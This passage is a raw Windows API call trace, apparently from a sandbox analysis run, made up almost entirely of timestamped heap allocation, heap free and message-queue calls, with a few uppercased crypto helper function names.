(in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127d4) returned 0x955018 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.973] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0033.973] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.973] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0033.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2a8 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127d4) returned 0x955018 [0033.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da198 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0033.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0033.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cce8 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0033.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x127d4) returned 0x979fd8 [0033.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0033.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0033.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0033.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0033.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0033.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0033.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0033.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0033.976] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0033.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0033.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.976] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0033.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0033.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da268 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.976] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0033.976] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0033.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0033.977] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.977] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.977] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.977] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.978] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.978] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0033.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0033.979] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.979] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.979] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0033.979] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.979] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0033.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0033.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0033.980] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0033.980] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0033.981] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.981] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0033.981] RtlAllocateHeap 